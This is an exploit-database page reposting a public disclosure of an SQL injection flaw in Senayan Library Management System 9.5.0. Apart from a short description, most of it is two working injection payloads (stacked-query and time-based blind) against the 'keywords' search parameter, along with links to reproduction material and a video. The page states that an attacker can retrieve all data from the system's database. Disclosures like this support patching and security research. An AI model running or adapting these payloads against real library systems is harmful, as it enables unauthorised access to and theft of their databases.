Advertisement




Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022110006

Below is a copy:

Senayan Library Management System 9.5.0 SQL Injection
## Title: Senayan Library Management System v9.5.0 a.k.a SLIMS 9 BULIAN SQLi
## Author: nu11secur1ty
## Date: 11.03.2022
## Vendor: https://slims.web.id/web/
## Software: https://github.com/slims/slims9_bulian/releases
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0

## Description:
The `keywords` parameter appears to be vulnerable to SQL injection attacks.
A single quote was submitted in the keywords parameter, and a general
error message was returned.
Two single quotes were then submitted and the error message
disappeared. The injection is confirmed manually from nu11secur1ty.
The attacker can retrieve all information from the database of this
system, by using this vulnerability.

## STATUS: HIGH Vulnerability

[+] Payload:

```MySQL
---
Parameter: keywords (GET)
    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')));SELECT
SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)
    Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')))
RLIKE (SELECT 9971 FROM (SELECT(SLEEP(5)))bdiv)#
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0)

## Proof and Exploit:
[href](https://streamable.com/63og5v)

## Time spent
`3:00`

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.